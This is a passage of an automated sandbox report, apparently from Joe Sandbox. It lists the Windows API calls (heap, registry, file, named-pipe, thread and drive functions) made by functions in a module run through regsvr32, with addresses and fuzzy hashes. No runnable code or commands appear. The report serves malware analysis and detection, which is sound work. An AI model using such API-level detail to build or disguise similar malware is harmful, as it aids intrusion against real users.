                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04BDEFFD
                • HeapFree.KERNEL32(00000000,?), ref: 04BDF034
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BDF048
                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04BDF051
                • SuspendThread.KERNEL32(?), ref: 04BDF060
                • CreateEventA.KERNEL32(04BEE268,00000001,00000000), ref: 04BDF074
                • SetEvent.KERNEL32(00000000), ref: 04BDF081
                • CloseHandle.KERNEL32(00000000), ref: 04BDF088
                • Sleep.KERNEL32(000001F4), ref: 04BDF09B
                • ResumeThread.KERNEL32(?), ref: 04BDF0BF
                Similarity
                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                • String ID:
                • API String ID: 1011176505-0
                • Opcode ID: ae2d8ae574d5d2d1666a2d2c5d680553cf0021eef0d39cfc30965a6bcebbc9d3
                • Instruction ID: bde0048486ac70316aaa5263a4aeca4a96dab5fec3cb9f6e5e70e6a656841533
                • Opcode Fuzzy Hash: ae2d8ae574d5d2d1666a2d2c5d680553cf0021eef0d39cfc30965a6bcebbc9d3
                • Instruction Fuzzy Hash: 60417372900509FFDB11AFB6DC8896DBBB9FB84304B0444AAF602EB111D739AD91DB71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BC7CD6
                • StrChrA.SHLWAPI(?,0000000D), ref: 04BC7D1C
                • StrChrA.SHLWAPI(?,0000000A), ref: 04BC7D29
                • StrChrA.SHLWAPI(?,0000007C), ref: 04BC7D50
                • StrTrimA.SHLWAPI(?,04BEA4A4), ref: 04BC7D65
                • StrChrA.SHLWAPI(?,0000003D), ref: 04BC7D6E
                • StrTrimA.SHLWAPI(00000001,04BEA4A4), ref: 04BC7D84
                • _strupr.NTDLL ref: 04BC7D8B
                • StrTrimA.SHLWAPI(?,?), ref: 04BC7D98
                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04BC7DE0
                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000000,?,?,04BC158F), ref: 04BC7DFF
                Strings
                Similarity
                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                • String ID: $;
                • API String ID: 4019332941-73438061
                • Opcode ID: 90ece5766eb7281c63a36f01278eead3780f963b9efba789641c4dffd444e7f5
                • Instruction ID: af26e1eca12e2516f7b4201c13443c6fdab5ecc1f8b59324b9d259dc8929f0d0
                • Opcode Fuzzy Hash: 90ece5766eb7281c63a36f01278eead3780f963b9efba789641c4dffd444e7f5
                • Instruction Fuzzy Hash: EA4194725043079FD721EF298C84B2BBBEDEF94700F04089EF9959B241EB74E9058BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC76F3
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC770C
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC7717
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC7730
                • lstrlen.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000), ref: 04BC77C8
                • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 04BC77EA
                • lstrcpy.KERNEL32(00000020,?), ref: 04BC7809
                • lstrlen.KERNEL32(?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC7813
                • memcpy.NTDLL(?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B,?), ref: 04BC7854
                • memcpy.NTDLL(?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F,00000000,0000000B), ref: 04BC7867
                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057), ref: 04BC788B
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,04BDC9ED,?,00000000,0000001E), ref: 04BC78AA
                • HeapFree.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F), ref: 04BC78D0
                • HeapFree.KERNEL32(00000000,00000001,00000001,?,?,00000000,?,00000000,04BDC9ED,?,00000000,0000001E,00000001,00000057,04BC159F,04BC158F), ref: 04BC78EC
                Similarity
                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                • String ID:
                • API String ID: 3323474148-0
                • Opcode ID: e162364f23d99a27c3b3b51e7c0e0aae3e45a94f425a72b3b2f3162e52bf9d61
                • Instruction ID: 5dffeffd7f689508be561b58f05fe14449fb501b71dbaef530e3204a33f2a561
                • Opcode Fuzzy Hash: e162364f23d99a27c3b3b51e7c0e0aae3e45a94f425a72b3b2f3162e52bf9d61
                • Instruction Fuzzy Hash: 2F718B31504306AFD721DF25C884A5BBBE8FB88314F0449AEF599D7251EB35E944CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,?,00000000), ref: 04BC9DB7
                • lstrlen.KERNEL32(?,?,00000000), ref: 04BC9DBE
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9DD5
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC9DE6
                • lstrcat.KERNEL32(?,?), ref: 04BC9E02
                • lstrcat.KERNEL32(?,?), ref: 04BC9E13
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9E24
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC9EC1
                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 04BC9EFA
                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 04BC9F13
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04BC9F1D
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04BC9F2D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BC9F46
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04BC9F56
                Similarity
                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                • String ID:
                • API String ID: 333890978-0
                • Opcode ID: 0b1f38d95dce55b6a14e171321aae48c94ff858b2acca85c71f348105d633918
                • Instruction ID: e3cc27de03b757f3c50e6bce02645de26dd10d968598f8351020f72fda5604d8
                • Opcode Fuzzy Hash: 0b1f38d95dce55b6a14e171321aae48c94ff858b2acca85c71f348105d633918
                • Instruction Fuzzy Hash: E45149B2800109FFEB11AFA5DC84CAE7BBDFB88344B05846AF615DB111D675AE059B70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BDB89D: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BDB8E2
                  • Part of subcall function 04BDB89D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BDB8FA
                  • Part of subcall function 04BDB89D: WaitForSingleObject.KERNEL32(00000000,?,?,?,04BC140C,?), ref: 04BDB9C2
                  • Part of subcall function 04BDB89D: HeapFree.KERNEL32(00000000,?,?,?,?,04BC140C,?), ref: 04BDB9EB
                  • Part of subcall function 04BDB89D: HeapFree.KERNEL32(00000000,?,?,?,?,04BC140C,?), ref: 04BDB9FB
                  • Part of subcall function 04BDB89D: RegCloseKey.ADVAPI32(?,?,?,?,04BC140C,?), ref: 04BDBA04
                • lstrcmp.KERNEL32(?,00000000), ref: 04BD1607
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04BC133F,00000000,00000000), ref: 04BD1633
                • GetCurrentThreadId.KERNEL32 ref: 04BD16E4
                • GetCurrentThread.KERNEL32 ref: 04BD16F5
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,04BDA46B,04BC133F,00000001,74E5F730,00000000,00000000), ref: 04BD1732
                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,04BDA46B,04BC133F,00000001,74E5F730,00000000,00000000), ref: 04BD1746
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD1754
                • wsprintfA.USER32 ref: 04BD176C
                  • Part of subcall function 04BC3FF7: lstrlen.KERNEL32(04BC158F,00000000,04BE6C5B,00000000,04BE4160,04BC158F,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC4001
                  • Part of subcall function 04BC3FF7: lstrcpy.KERNEL32(00000000,04BC158F), ref: 04BC4025
                  • Part of subcall function 04BC3FF7: StrRChrA.SHLWAPI(04BC158F,00000000,0000002E,?,00000003,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC402C
                  • Part of subcall function 04BC3FF7: lstrcat.KERNEL32(00000000,?), ref: 04BC4083
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD1777
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD178E
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD179F
                • HeapFree.KERNEL32(00000000,?), ref: 04BD17AB
                Similarity
                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                • String ID:
                • API String ID: 773763258-0
                • Opcode ID: f0d4cb03f710410db83f0794a9de3fc56aad34596d9b95a8fa16fbbefb4e598a
                • Instruction ID: bf13e5a0b211dbf45ab3868dd83b77dd3b8182ef934a76cf82f061167f4c462d
                • Opcode Fuzzy Hash: f0d4cb03f710410db83f0794a9de3fc56aad34596d9b95a8fa16fbbefb4e598a
                • Instruction Fuzzy Hash: C8710371900219EFDB11DFA9DC84DEEBBB9FF48304F0480A6E505AB220E735AD45DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BD565A
                • WaitForSingleObject.KERNEL32(0000053C,00000000), ref: 04BD567C
                • ConnectNamedPipe.KERNEL32(?,?), ref: 04BD569C
                • GetLastError.KERNEL32 ref: 04BD56A6
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BD56CA
                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 04BD570D
                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04BD5716
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BD571F
                • CloseHandle.KERNEL32(?), ref: 04BD5734
                • GetLastError.KERNEL32 ref: 04BD5741
                • CloseHandle.KERNEL32(?), ref: 04BD574E
                • RtlExitUserThread.NTDLL(000000FF), ref: 04BD5764
                Similarity
                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                • String ID:
                • API String ID: 4053378866-0
                • Opcode ID: 5bb0d1564f1081248835c333b899ec820e936898a37334aec9e9b4c9a88fc55c
                • Instruction ID: 46bd30ddc0222d8370f34e7e34f5412cc79ec38f3340439eddfd503d2bb273f0
                • Opcode Fuzzy Hash: 5bb0d1564f1081248835c333b899ec820e936898a37334aec9e9b4c9a88fc55c
                • Instruction Fuzzy Hash: 28318270004705BFE721AF25CC4896FBBA9FB84364F100A6AF565D71A0D774EE058BB6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BC46F4
                  • Part of subcall function 04BC4B8D: RegCloseKey.ADVAPI32(?,?,?,04BE5181,00000000,00000000,00000000), ref: 04BC4C14
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BC472F
                • lstrcpyW.KERNEL32(-00000002,?), ref: 04BC4790
                • lstrcatW.KERNEL32(00000000,?), ref: 04BC47A5
                • lstrcpyW.KERNEL32(?), ref: 04BC47BF
                • lstrcatW.KERNEL32(00000000,?), ref: 04BC47CE
                  • Part of subcall function 04BC8D95: lstrlenW.KERNEL32(?,?,?,04BD71F4,?,?,?,?,00001000,?,?,00001000), ref: 04BC8DA8
                  • Part of subcall function 04BC8D95: lstrlen.KERNEL32(?,?,04BD71F4,?,?,?,?,00001000,?,?,00001000), ref: 04BC8DB3
                  • Part of subcall function 04BC8D95: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04BC8DC8
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 04BC4838
                  • Part of subcall function 04BE2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04BE523E,?), ref: 04BE253D
                  • Part of subcall function 04BE2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04BE523E,?), ref: 04BE2565
                  • Part of subcall function 04BE2531: memset.NTDLL ref: 04BE2577
                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 04BC486D
                • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 04BC4878
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC488E
                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 04BC48A0
                Similarity
                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                • String ID:
                • API String ID: 1430934453-0
                • Opcode ID: e96349dc69f27713d495d69be52a25e0b096eef5613e7e7f6f78463d0171cc8c
                • Instruction ID: cfc8269c78e740bdf018c46441d2d7b054ddc6043a9457600db819f2146a4713
                • Opcode Fuzzy Hash: e96349dc69f27713d495d69be52a25e0b096eef5613e7e7f6f78463d0171cc8c
                • Instruction Fuzzy Hash: E5513A3190010AEBDB11EFA6DD94EAE77BDEF84304F1400AAE904AB151E735EE119B71
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BE4513
                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04BE4528
                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04BE4550
                • HeapFree.KERNEL32(00000000,00000001), ref: 04BE4591
                • HeapFree.KERNEL32(00000000,?), ref: 04BE45A1
                • RtlAllocateHeap.NTDLL(00000000,04BC5114), ref: 04BE45B4
                • RtlAllocateHeap.NTDLL(00000000,04BC5114), ref: 04BE45C3
                • HeapFree.KERNEL32(00000000,?,?,04BC5114,?,00000001,?,?), ref: 04BE460D
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE4631
                • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE4656
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04BC5114,?,00000001), ref: 04BE466B
                Similarity
                • API ID: Heap$Free$Allocate$CloseCreate
                • String ID:
                • API String ID: 4126010716-0
                • Opcode ID: 695829822781d1a035fc695395b6804af34ab11ef5388aa5d24db1171c4a7ed6
                • Instruction ID: 1880da62b861456fec9943f74dba991748b4ba25be22912a9eba49b56607ed6e
                • Opcode Fuzzy Hash: 695829822781d1a035fc695395b6804af34ab11ef5388aa5d24db1171c4a7ed6
                • Instruction Fuzzy Hash: 5A51ADB5900209EFDF01DFA6D8848EEBBB9FB88345F1044AAE505A6210D735AE95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • wcscpy.NTDLL ref: 04BDFDB6
                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04BDFDC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDFDD3
                • memset.NTDLL ref: 04BDFDF0
                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04BDFDFE
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BDFE0C
                • GetDriveTypeW.KERNEL32(?), ref: 04BDFE1A
                • lstrlenW.KERNEL32(?), ref: 04BDFE26
                • wcscpy.NTDLL ref: 04BDFE38
                • lstrlenW.KERNEL32(?), ref: 04BDFE52
                • HeapFree.KERNEL32(00000000,?), ref: 04BDFE6B
                Similarity
                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                • String ID:
                • API String ID: 3888849384-0
                • Opcode ID: 77626d99ebdca3665dd402b7f72d48e6db4fb2437d5d672e34878eef7ae26448
                • Instruction ID: b334d02b7791823db66ba1068f08aa22682f35e10b3e5b1c62b0ac4162ba6c82
                • Opcode Fuzzy Hash: 77626d99ebdca3665dd402b7f72d48e6db4fb2437d5d672e34878eef7ae26448
                • Instruction Fuzzy Hash: EB310D32804118BFDB11ABA6DC48CEFBF79FF89350B104496E105E7111E739AA55DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BCFED4
                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFEE6
                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFEF3
                • wsprintfA.USER32 ref: 04BCFF0E
                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,04BC78A1,00000000,00000094,00000000), ref: 04BCFF24
                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04BCFF3D
                • WriteFile.KERNEL32(00000000,00000000), ref: 04BCFF45
                • GetLastError.KERNEL32 ref: 04BCFF53
                • CloseHandle.KERNEL32(00000000), ref: 04BCFF5C
                • GetLastError.KERNEL32(?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094,00000000), ref: 04BCFF6D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,04BDA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,04BC78A1,00000000,00000094), ref: 04BCFF7D
                Similarity
                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                • String ID:
                • API String ID: 3873609385-0
                • Opcode ID: 23a5a72b3341c8689b91a2b366aed402c546051eeab0383264cdc78148e7b831
                • Instruction ID: e869cb81c709e1036f21f3921801eade74b35c1700cb74e7380389d27f1c4044
                • Opcode Fuzzy Hash: 23a5a72b3341c8689b91a2b366aed402c546051eeab0383264cdc78148e7b831
                • Instruction Fuzzy Hash: 4011E471142518BFE3217B76ACCCF7B3B5DEB82359F0400AAF906D7181EA685D059671
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,0000002C,7673D3B0,00000000,74E05520,74E5F710), ref: 04BD1478
                • StrChrA.SHLWAPI(00000001,0000002C), ref: 04BD148B
                • StrTrimA.SHLWAPI(00000000,?), ref: 04BD14AE
                • StrTrimA.SHLWAPI(00000001,?), ref: 04BD14BD
                • lstrlen.KERNEL32(00000000), ref: 04BD14F2
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BD1505
                • lstrcpy.KERNEL32(00000004,00000000), ref: 04BD1523
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 04BD1547
                Strings
                Similarity
                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                • String ID: W
                • API String ID: 1974185407-655174618
                • Opcode ID: 95993890a8175b43c69ca92862101a7573e13aa32b7af1b9329b7e34f595e172
                • Instruction ID: 83e5590e19a716d7fca0229a7e8dd9c04c095654f121204a9f0e23d3ace96576
                • Opcode Fuzzy Hash: 95993890a8175b43c69ca92862101a7573e13aa32b7af1b9329b7e34f595e172
                • Instruction Fuzzy Hash: D3315E75900219FBDB119F79C889E9A7BB8EF88754F1480DAF5059B200E778EA40DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BD84A5
                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BD84C4
                  • Part of subcall function 04BDD327: wsprintfA.USER32 ref: 04BDD33A
                  • Part of subcall function 04BDD327: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BDD34C
                  • Part of subcall function 04BDD327: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BDD376
                  • Part of subcall function 04BDD327: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BDD389
                  • Part of subcall function 04BDD327: CloseHandle.KERNEL32(?), ref: 04BDD392
                • GetLastError.KERNEL32 ref: 04BD8797
                • RtlEnterCriticalSection.NTDLL(?), ref: 04BD87A7
                • RtlLeaveCriticalSection.NTDLL(?), ref: 04BD87B8
                • RtlExitUserThread.NTDLL(?), ref: 04BD87C6
                Similarity
                • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                • String ID:
                • API String ID: 1258333524-0
                • Opcode ID: b6b243c53391df570041933ec8aa9c72b547989df8fc09623678e69e97fa3c36
                • Instruction ID: 9cb3992a34dd09c72e5fd03cd80adcb2c266b5b8dfa875262dacb8ddcc2c2d4f
                • Opcode Fuzzy Hash: b6b243c53391df570041933ec8aa9c72b547989df8fc09623678e69e97fa3c36
                • Instruction Fuzzy Hash: 82B15E71500709AFEB20AF26CC84AAA7BF9FF48306F2045AAF569D6150E774EC54CF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD0C78: memset.NTDLL ref: 04BD0C9A
                  • Part of subcall function 04BD0C78: CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BD0D44
                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04BE4035
                • CloseHandle.KERNEL32(?), ref: 04BE4041
                • PathFindFileNameW.SHLWAPI(?), ref: 04BE4051
                • lstrlenW.KERNEL32(00000000), ref: 04BE405B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BE406C
                • wcstombs.NTDLL ref: 04BE407D
                • lstrlen.KERNEL32(?), ref: 04BE408A
                • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 04BE40C9
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BE40DB
                • DeleteFileW.KERNEL32(?), ref: 04BE40E9
                Similarity
                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                • String ID:
                • API String ID: 2256351002-0
                • Opcode ID: e52f86d21cefbf233199ed9aeb2197c14874a44ca664976699e0daa70ed42081
                • Instruction ID: 40e181d9a262d1328d6f68823cb8ec5bc3e696715e6b208cd714e618a11d190c
                • Opcode Fuzzy Hash: e52f86d21cefbf233199ed9aeb2197c14874a44ca664976699e0daa70ed42081
                • Instruction Fuzzy Hash: E431F671800109EBCF21AFA6D8898AE7B79FF84345B00446AFA02A7111DB359E64DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetTickCount.KERNEL32 ref: 04BE2459
                • CreateFileW.KERNEL32(04BDA7DD,80000000,00000003,04BEE268,00000003,00000000,00000000,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2476
                • GetLastError.KERNEL32(?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE251E
                  • Part of subcall function 04BE41CF: lstrlen.KERNEL32(?,00000000,04BE249E,00000027,04BEE268,?,00000000,?,?,04BE249E,?,00000001,?,04BDA7DD,00000000,?), ref: 04BE4205
                  • Part of subcall function 04BE41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 04BE4229
                  • Part of subcall function 04BE41CF: lstrcat.KERNEL32(00000000,00000000), ref: 04BE4231
                • GetFileSize.KERNEL32(04BDA7DD,00000000,?,00000001,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24A9
                • CreateFileMappingA.KERNEL32(04BDA7DD,04BEE268,00000002,00000000,00000000,04BDA7DD), ref: 04BE24BD
                • lstrlen.KERNEL32(04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24D9
                • lstrcpy.KERNEL32(?,04BDA7DD), ref: 04BE24E9
                • GetLastError.KERNEL32(?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24F1
                • HeapFree.KERNEL32(00000000,04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2504
                • CloseHandle.KERNEL32(04BDA7DD,?,00000001,?,04BDA7DD), ref: 04BE2516
                Similarity
                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                • String ID:
                • API String ID: 194907169-0
                • Opcode ID: 72822161e792c47e66a319beb0c5cedb4dee88d68172076607810fca59619583
                • Instruction ID: 292ecf066d7acb03a25c0f72270a7313ba91036aab72a012f4393915b13e4d80
                • Opcode Fuzzy Hash: 72822161e792c47e66a319beb0c5cedb4dee88d68172076607810fca59619583
                • Instruction Fuzzy Hash: D7213971900608FFDB10AFA6D848AAEBFB9EB84351F1080AAF505EB151D7359E409F70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetEvent.KERNEL32(?,?,04BCCE97), ref: 04BD1D70
                  • Part of subcall function 04BD810B: InterlockedExchange.KERNEL32(?,000000FF), ref: 04BD8112
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BCCE97), ref: 04BD1D90
                • CloseHandle.KERNEL32(00000000,?,04BCCE97), ref: 04BD1D99
                • CloseHandle.KERNEL32(?,?,?,04BCCE97), ref: 04BD1DA3
                • RtlEnterCriticalSection.NTDLL(?), ref: 04BD1DAB
                • RtlLeaveCriticalSection.NTDLL(?), ref: 04BD1DC3
                • Sleep.KERNEL32(000001F4), ref: 04BD1DD2
                • CloseHandle.KERNEL32(?), ref: 04BD1DDF
                • LocalFree.KERNEL32(?), ref: 04BD1DEA
                • RtlDeleteCriticalSection.NTDLL(?), ref: 04BD1DF4
                Similarity
                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                • String ID:
                • API String ID: 1408595562-0
                • Opcode ID: 73f0e616c261db8bad732b7943bec1dd9442c3c601425590e3a846c0ea8e27f8
                • Instruction ID: 38f61303da094371727fe9f15014c141a90b90eb3223317279db6956ad5f68f7
                • Opcode Fuzzy Hash: 73f0e616c261db8bad732b7943bec1dd9442c3c601425590e3a846c0ea8e27f8
                • Instruction Fuzzy Hash: ED114C31240A159FDB216F7ADC48A5AB7B9EF84741304499AE68397510EB3AF8409B70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000001,00000000,?,?,04BCBD83,?,00000001,?,?,?), ref: 04BD3756
                • lstrlen.KERNEL32(?), ref: 04BD3766
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BD379A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04BD37C5
                • memcpy.NTDLL(00000000,?,?), ref: 04BD37E4
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD3845
                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04BD3867
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocatelstrlenmemcpy$Free
                • String ID: W
                • API String ID: 3204852930-655174618
                • Opcode ID: bf12ddf8a503e0d40b28614e9b3fea990d40f3a207eaf5f9f7ba6b41104ac122
                • Instruction ID: 9c3ad47c2c0c9557044a21099ee1bc929e5172ef3dc03a10f3ab7c437e1a2f82
                • Opcode Fuzzy Hash: bf12ddf8a503e0d40b28614e9b3fea990d40f3a207eaf5f9f7ba6b41104ac122
                • Instruction Fuzzy Hash: 474117B1D00209EFDF11DFA5CC84AAE7BB9EF44344F1484AAED04A7211E736AA54DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL ref: 04BCC61A
                • memset.NTDLL ref: 04BCC62E
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
